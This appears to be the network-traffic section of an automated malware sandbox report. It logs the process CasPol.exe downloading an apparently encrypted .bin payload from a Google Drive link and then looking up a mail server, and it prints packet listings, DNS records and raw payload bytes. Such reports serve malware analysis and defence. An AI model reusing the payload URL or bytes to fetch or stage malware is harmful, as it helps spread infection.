                                            Nov 22, 2021 14:23:12.691323042 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.691329002 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.696330070 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.696470976 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.696715117 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.697141886 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.739825010 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.923103094 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.923305988 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.923324108 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.923520088 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.923530102 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.923597097 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.923614025 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.923630953 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.923939943 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.924253941 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.924504995 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.924957037 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.925251961 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.928350925 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.928580999 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.931159019 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.931643963 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.931684971 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.931884050 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.933686018 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.933844090 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.933876038 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.933917999 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.934009075 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.934130907 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.934175968 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.934189081 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.934458017 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.935013056 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.935178041 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.935193062 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.935230017 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.935429096 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.935941935 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.936109066 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.936248064 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.936299086 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.936332941 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.936564922 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.936795950 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.936973095 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.937220097 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.937262058 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.937272072 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.937582970 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.937741995 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.937907934 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.937920094 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.937943935 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.938128948 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.938554049 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.938738108 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.938915968 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.938940048 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.938947916 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.939276934 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.939534903 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.939708948 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.939713001 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.939738989 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.939999104 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.940035105 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.940373898 CET44349765142.250.181.225192.168.11.20

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 22, 2021 14:23:11.699083090 CET5693553192.168.11.201.1.1.1
                                            Nov 22, 2021 14:23:11.708678961 CET53569351.1.1.1192.168.11.20
                                            Nov 22, 2021 14:23:12.615381002 CET6164953192.168.11.201.1.1.1
                                            Nov 22, 2021 14:23:12.655584097 CET53616491.1.1.1192.168.11.20
                                            Nov 22, 2021 14:24:48.699805975 CET4933253192.168.11.201.1.1.1
                                            Nov 22, 2021 14:24:48.823791027 CET53493321.1.1.1192.168.11.20
                                            Nov 22, 2021 14:24:49.355092049 CET5026253192.168.11.201.1.1.1

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Nov 22, 2021 14:23:11.699083090 CET192.168.11.201.1.1.10x5945Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                            Nov 22, 2021 14:23:12.615381002 CET192.168.11.201.1.1.10xf392Standard query (0)doc-00-5k-docs.googleusercontent.comA (IP address)IN (0x0001)
                                            Nov 22, 2021 14:24:48.699805975 CET192.168.11.201.1.1.10x786fStandard query (0)mail.neopyme.comA (IP address)IN (0x0001)
                                            Nov 22, 2021 14:24:49.355092049 CET192.168.11.201.1.1.10xff29Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Nov 22, 2021 14:22:41.283456087 CET1.1.1.1192.168.11.200xe9f4No error (0)devcenterapi.azure-api.netapimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                            Nov 22, 2021 14:22:41.283456087 CET1.1.1.1192.168.11.200xe9f4No error (0)devcenterapi-eastus-01.regional.azure-api.netapimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.netCNAME (Canonical name)IN (0x0001)
                                            Nov 22, 2021 14:23:11.708678961 CET1.1.1.1192.168.11.200x5945No error (0)drive.google.com172.217.16.142A (IP address)IN (0x0001)
                                            Nov 22, 2021 14:23:12.655584097 CET1.1.1.1192.168.11.200xf392No error (0)doc-00-5k-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                            Nov 22, 2021 14:23:12.655584097 CET1.1.1.1192.168.11.200xf392No error (0)googlehosted.l.googleusercontent.com142.250.181.225A (IP address)IN (0x0001)
                                            Nov 22, 2021 14:24:48.823791027 CET1.1.1.1192.168.11.200x786fNo error (0)mail.neopyme.comneopyme.comCNAME (Canonical name)IN (0x0001)
                                            Nov 22, 2021 14:24:48.823791027 CET1.1.1.1192.168.11.200x786fNo error (0)neopyme.com54.36.109.179A (IP address)IN (0x0001)
                                            Nov 22, 2021 14:24:49.372438908 CET1.1.1.1192.168.11.200xff29No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • drive.google.com
                                            • doc-00-5k-docs.googleusercontent.com

                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.11.2049764172.217.16.142443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-11-22 13:23:11 UTC0OUTGET /uc?export=download&id=12bEv52T0WqCex9NqBV7JSBLb08xvi7Jq HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                            Host: drive.google.com
                                            Cache-Control: no-cache
                                            2021-11-22 13:23:12 UTC0INHTTP/1.1 302 Moved Temporarily
                                            Content-Type: text/html; charset=UTF-8
                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                            Pragma: no-cache
                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                            Date: Mon, 22 Nov 2021 13:23:12 GMT
                                            Location: https://doc-00-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mppp68ugon2ln1s6q81d25lmk78u5skq/1637587350000/06007705055686197661/*/12bEv52T0WqCex9NqBV7JSBLb08xvi7Jq?e=download
                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                            Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                            Content-Security-Policy: script-src 'nonce-tqJfvi7vK9KtwQMNiccS9Q' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                            Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: SAMEORIGIN
                                            X-XSS-Protection: 1; mode=block
                                            Server: GSE
                                            Set-Cookie: NID=511=RZfcUcB2ReUrII0ID7SC-hl5ik9215ymKswLpMxZ1g7Njry6x4snR1YFzz1Co_5bST8WN2I1eiiNyiJ6zc6ECTxGM03OLhwWE1DbSofrthZRGgO56VWxCDwXRDjzZGHyaGNxrmJcT6MW2hGNA08TGUi1_dHAy6h3LI2Eg_WKr50; expires=Tue, 24-May-2022 13:23:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                            Accept-Ranges: none
                                            Vary: Accept-Encoding
                                            Connection: close
                                            Transfer-Encoding: chunked
                                            2021-11-22 13:23:12 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 30 2d 35 6b 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 6d 70 70 70
                                            Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-00-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mppp
                                            2021-11-22 13:23:12 UTC2INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.11.2049765142.250.181.225443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-11-22 13:23:12 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mppp68ugon2ln1s6q81d25lmk78u5skq/1637587350000/06007705055686197661/*/12bEv52T0WqCex9NqBV7JSBLb08xvi7Jq?e=download HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                            Cache-Control: no-cache
                                            Host: doc-00-5k-docs.googleusercontent.com
                                            Connection: Keep-Alive
                                            2021-11-22 13:23:12 UTC2INHTTP/1.1 200 OK
                                            X-GUploader-UploadID: ADPycdt3KWWxeIf15mNQTJoxv-AmwNeyc69wQHIoj9LqK9rfEB1k8CXTls8Fdb0FLi0srYNQHZf2y2__fYbsT_8Lr0BT3ahGdw
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Credentials: false
                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                            Access-Control-Allow-Methods: GET,OPTIONS
                                            Content-Type: application/octet-stream
                                            Content-Disposition: attachment;filename="bob jp_mkQKlV210.bin";filename*=UTF-8''bob%20jp_mkQKlV210.bin
                                            Content-Length: 221760
                                            Date: Mon, 22 Nov 2021 13:23:12 GMT
                                            Expires: Mon, 22 Nov 2021 13:23:12 GMT
                                            Cache-Control: private, max-age=0
                                            X-Goog-Hash: crc32c=Q2ixew==
                                            Server: UploadServer
                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                            Connection: close
                                            2021-11-22 13:23:12 UTC6INData Raw: dc 5e 26 e2 da 0f 3d a5 c0 52 fd 79 d3 b7 69 82 56 62 96 2a 18 f1 39 31 78 59 27 9d 90 d5 51 b0 f9 0c dc 01 cc 57 c8 c8 68 ef cf 29 39 86 32 b0 88 7a 10 09 ea aa 51 c2 a9 6b 01 fd f4 79 70 cd f8 79 a7 df ad 4f ba db d2 5a ca cc cb 1b 48 54 be e9 c2 30 86 d3 b5 65 f5 6b b0 fd 15 31 ec 8d fb 7f 3b ef 83 c0 bb 62 0d 42 bd dc 83 b1 26 53 ed 31 77 e0 1e c7 62 f8 70 ce 4d 41 d4 18 bf a8 28 5f 9f 31 0a 25 97 dc 0e f4 38 f9 fa b0 ce 4e 31 10 20 7f 53 fd ab 96 d4 fb f3 36 f3 aa e6 17 d1 52 ec f8 d6 38 2d 3f 52 3a de 87 87 53 72 d8 f6 3b ff 6b 80 ac bc 6d 71 12 eb d9 4d 12 98 56 fe 03 38 c5 aa 5e 2e 93 81 8c b4 cb 5f ea d8 6e 38 1f 04 fb 46 4e f1 ab 56 16 87 ee 9f a2 46 70 1d 57 b6 78 2c ee 80 e3 e2 ef b7 e2 1f 02 35 33 a6 e7 dc 16 90 ee 00 4a ac 1e 8e fb 3c a3 63
                                            Data Ascii: ^&=RyiVb*91xY'QWh)92zQkypyOZHT0ek1;bB&S1wbpMA(_1%8N1 S6R8-?R:Sr;kmqMV8^._n8FNVFpWx,53J<c
                                            2021-11-22 13:23:12 UTC9INData Raw: f4 f1 18 b6 07 e4 64 0e 54 ba 18 29 95 17 ba 4f 5e a6 82 d3 a9 f3 6d 6f d9 92 b7 52 d4 08 bf 48 77 2e 6c 99 74 71 76 b4 dd f3 0d e1 d8 dc c6 bf 0a 93 d7 9d d3 8f ce 1f 3d f0 3a 6f b2 52 6f a7 64 99 95 92 db de ea e8 3a ba 17 00 fa f3 9f 69 3d e2 3e 55 79 f6 e0 e9 1d 4c cb c0 2c 9f 3f fc 4f 5e d8 ee 9c 6b 50 27 0f 2c 91 ef b0 35 13 98 f9 2f 42 a1 1d 1e a3 37 b4 80 04 21 85 0a ed eb 0b ed f3 e2 5b c1 59 d2 c7 2d 26 a6 2b a5 4e c4 0a ba 3a 27 cb 4e ae d5 13 6c 3b 93 e6 3d a1 1b e6 4e 06 9e b3 11 0c 2a 61 0d 46 bf 46 1b 1a 2f 38 0c 2c d7 05 a2 b9 03 56 30 01 fb 90 37 a1 80 30 65 5f 49 bc 17 4f 59 53 bf 74 39 98 59 b0 98 0e 76 e4 05 50 fd f5 d9 7f 78 f7 94 a9 e6 a2 d8 ba a3 de f8 ac 08 8c 7f f0 af 07 92 e1 03 e3 1f c1 61 0a 95 e7 64 ff 20 6f 65 5e 88 ee 57 cb
                                            Data Ascii: dT)O^moRHw.ltqv=:oRod:i=>UyL,?O^kP',5/B7![Y-&+N:'Nl;=N*aFF/8,V070e_IOYSt9YvPxad oe^W
                                            2021-11-22 13:23:12 UTC13INData Raw: 5e fe 4f d4 1f b7 2e 63 bd 6b 50 d6 ff 49 e5 99 02 ab ca b8 1e ca ac 28 73 1b b5 2d 55 5d 33 11 d5 c0 6e 4f 54 16 35 87 0f 90 fd c9 1b ad 8b 1e 11 21 44 55 6a 42 38 ce cc 2f 96 d8 46 7f 76 64 9a ef 95 45 15 2a ca 99 ac 7f 9b 58 a1 64 d2 1e 21 60 07 67 f6 f3 62 8a b6 9e 20 94 f6 09 a8 2d c6 05 a0 04 2f f6 4d c3 3e 7f 1f 61 aa 60 ae 1e fb 0c ba 59 84 aa 3f 47 71 20 1b 82 d4 a1 bd 77 45 69 95 b4 97 22 7c a3 bb 85 5b 0d e0 b5 25 1f 44 ae 4f b0 c4 dc d6 95 cc 34 e5 60 cf 06 e9 c8 2f 8c 5f ea 65 b5 6a 98 66 15 31 e6 a5 8c 7d 3b e9 ab 5b bb 62 07 6a c5 de 83 b7 0e c8 ed 31 7d c8 3b c7 62 f2 58 55 4d 41 5e 30 fa aa 26 46 0d a4 0a 91 94 39 09 4c 39 bf 1f 0a 9a 26 52 7c 0a 83 7e 92 cc e5 9d 0d d3 55 98 ec f1 7a a5 74 a6 06 f6 4a 52 79 0a 51 b0 a1 eb 87 21 f8 91 7c
                                            Data Ascii: ^O.ckPI(s-U]3nOT5!DUjB8/FvdE*Xd!`gb -/M>a`Y?Gq wEi"|[%DO4`/_ejf1};[bj1};bXUMA^0&F9L9&R|~UztJRyQ!|
                                            2021-11-22 13:23:12 UTC17INData Raw: 9a 15 26 1b 2f c9 e0 e0 83 c1 30 d4 53 f3 b8 1e 90 27 c6 4d 13 c6 71 03 d2 1a c7 65 13 cd 50 37 3b a1 a5 8c 68 85 df 8d 02 35 34 31 f5 15 a8 49 e6 92 5b 6b 0b 08 4d b7 4b 97 5c 78 ba ef 63 11 67 37 d8 b3 10 bb 05 72 02 3b 08 6b ad 20 22 e3 94 38 c8 62 0c 28 c7 30 11 9f cb 98 bf 5c b7 8c f1 ab e1 45 5e b6 54 bd 7a f0 d4 b0 6b 55 31 54 99 7e 68 83 9c e3 d9 0d eb 06 dd ff b7 22 58 d7 e4 d5 f6 87 1f 37 fa e4 60 97 78 58 fe 64 d1 1d be f9 e6 ea e8 30 64 17 11 f2 76 d4 69 2f fe 51 93 78 ed da 32 12 7e e2 f7 2c 8a 35 ef 73 74 c8 a7 9c 61 84 53 14 95 93 ee bc 1b f3 d2 f9 25 60 74 54 1e a5 15 96 97 6b 67 96 3b f6 dc 03 91 bd e2 5d bd 3b fa 7c 25 20 b7 55 c4 66 78 02 bc 23 3d 83 01 ae df 31 34 13 df e2 2e 97 5c 0b 4c 06 92 a4 16 69 96 63 0b 2f c6 61 1b 10 23 7f 00
                                            Data Ascii: &/0S'MqeP7;h541I[kMK\xcg7r;k "8b(0\E^TzkU1T~h"X7`xXd0dvi/Qx2~,5staS%`tTkg;];|% Ufx#=14.\Lic/a#
                                            2021-11-22 13:23:12 UTC18INData Raw: d7 eb f0 27 8e 8f 4c 03 0d ee 73 7f a2 f5 0b 5c 73 38 bd b1 c4 6e ab 2e 78 d6 42 48 d6 f5 91 dc e2 6d 79 c0 b3 0b bd 76 2c 73 00 a8 08 c6 5d 1f 1a a2 d6 10 57 50 01 02 18 3b 43 fb c9 0c 81 b7 e0 10 0b 6f 6a 79 46 3e ce cf 5f 5c 26 47 59 5c 6b 9f d7 77 ac fc fd ff e7 b5 79 bd 81 b3 41 d2 1e 0e 62 23 57 f4 f9 79 b6 a2 8d 2f bc ce 18 be 2c 30 3b a1 03 38 76 42 ef 3c 63 0c 21 31 76 50 1f cc 83 b8 52 84 ac 34 f9 61 4c 0f 81 19 88 5e 59 92 7a d5 a5 eb 1d e7 a3 bf a7 36 79 e2 b3 0b 60 dd ae 49 d5 a3 d6 5a c0 6e 25 a4 50 7c 5e eb c2 36 24 c2 f5 7c 9d 12 b0 fd 1f 22 ae 9f b9 01 2d ef 83 c4 93 18 0d 42 b7 7e 92 f1 3c 7b 8b 33 77 e6 bc d6 22 d0 0b ce 4d 4b 7c 7f bd a8 20 68 0d 3f 0a 97 8f 16 40 9e 39 b5 3d b9 4a 24 58 65 28 21 23 92 ca 8b cd 96 d3 5f ba ac 8a 78 a3
                                            Data Ascii: 'Ls\s8n.xBHmyv,s]WP;CojyF>_\&GY\kwyAb#Wy/,0;8vB<c!1vPR4aL^Yz6y`IZn%P|^6$|"-B~<{3w"MK| h?@9=J$Xe(!#_x
                                            2021-11-22 13:23:12 UTC19INData Raw: ef 73 cf 67 27 d0 9b f1 bb 25 73 6d fd 06 6b a7 fe 03 c1 bc 0f c7 62 06 3b f7 18 29 9e cb 92 61 5c 9b 83 d9 77 ef 45 58 d9 d9 ba 7a fa 05 bf 4e 7d 1c 54 99 75 7b a8 b4 db 83 0a e1 d8 d3 ee bf 0a f9 d0 e4 d3 96 41 1f 37 ea 3a 6f b3 50 6f fe 64 ac 09 92 d1 d0 ea e8 3a 3f 10 00 fa 51 32 69 2f e2 3e 55 79 ed d0 ec 1d cf cd c0 2c 84 3f fc 5e fe f7 a7 9c 67 5a 53 3c 36 91 ee bb 33 3b d2 f9 81 4f ce 56 10 a3 3d b2 2b 6c 6d 85 05 e7 ed 2b d7 bd e2 5a ae 14 d2 c7 ec 27 b1 44 e5 4e c4 00 65 22 15 a4 0e ae d5 19 70 13 df e5 3d a7 74 b6 a6 01 94 b5 37 41 28 61 fd 2e ee 46 14 10 29 57 44 2c d7 0e a9 be 77 6c 35 09 fa ff 6a a1 80 3a 5e 19 4b bc 1e 59 71 7d a5 74 33 8f 19 3b 98 0e 54 eb 6a 04 f3 f7 d3 73 4f 92 cc a9 e9 a8 6f ad 6f 53 d3 ad 08 8d 72 f3 88 15 e1 b8 0d e3
                                            Data Ascii: sg'%smkb;)a\wEXzN}Tu{A7:oPod:?Q2i/>Uy,?^gZS<63;OV=+lm+Z'DNe"p=t7A(a.F)WD,wl5j:^KYq}t3;TjsOooSr
                                            2021-11-22 13:23:12 UTC20INData Raw: 74 48 84 29 7c 94 e2 fd e3 e5 b5 79 b1 40 82 40 d5 03 d5 4b 38 5c f6 e5 69 e4 59 9e 28 9e dc 06 b5 26 ea 07 5e 02 14 0e 4f f9 12 bc 0e 6a ad 71 46 e1 d6 22 af 45 8f ad 20 a7 8e 0d 35 ab fd 8f 66 20 cf 94 6a b4 bf 0a e7 b0 8b 8d 73 e2 e2 b5 23 10 df ae 5e ac c8 d2 62 4a cc 34 e4 48 45 02 f1 3c 31 aa da 9d 56 b5 6b ba f0 0c 22 e8 8d ea 7b 2c 11 82 ec b8 7a 1e 46 bd cd 87 ad d8 52 c1 20 70 8f 73 c7 62 f2 72 a1 bd 41 54 12 93 fb 3b 53 21 3f 1b 95 85 ef 2e 60 3e bc 3f 0b 91 3a 4b 67 00 1e 25 8b 32 e5 99 93 c5 59 88 d7 8c 78 b4 76 93 63 f7 66 5d 46 58 4d a3 a3 c3 0d 25 e2 65 55 b7 0b 85 80 aa 74 51 12 fa dd 5b ec 99 7a ad 51 2b c1 e6 4e 29 8d 2f 02 0d a8 74 ef e0 15 c7 e0 fb f3 b1 98 ff a2 54 99 3b dc 31 ec 6f 70 1d 5f ad 48 28 ee 07 e1 fc 99 9c e2 1f 33 1d ea
                                            Data Ascii: tH)|y@@K8\iY(&^OjqF"E 5f js#^bJ4HE<1Vk"{,zFR psbrAT;S!?.`>?:Kg%2Yxvcf]FXM%eUtQ[zQ+N)/tT;1op_H(3
